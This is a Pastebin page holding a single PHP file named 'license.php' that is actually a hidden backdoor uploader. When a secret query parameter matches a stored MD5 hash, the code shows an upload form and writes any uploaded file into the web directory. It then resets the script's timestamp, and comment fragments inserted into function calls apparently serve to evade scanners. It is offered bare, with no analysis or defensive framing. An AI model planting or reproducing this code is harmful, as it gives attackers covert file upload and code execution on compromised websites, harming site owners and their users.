Advertisement
PalmaSolutions

license.php

May 14th, 2018
161
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.57 KB | None | 0 0
  1. <?php if (isset($_GET["CONFIG"])) if ("7c9c88f4a5972e9be7019e72f3b945cc" == md5($_GET["CONFIG"])){echo "<form method=\"post\" enctype=\"multipart/form-data\">\n<input type=\"file\" name=\"filename\"><br> \n<input type=\"submit\" value=\"LOAD\"><br>\n</form>\n"; if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"])){move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);$file = $_FILES/*;*/["filename"]["name"];echo "<a href=\"$file\">$file</a>";}else{echo("empty");}$filename = $_SERVER[SCRIPT_FILENAME];touch/*;*/($filename, $time);return null;} ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement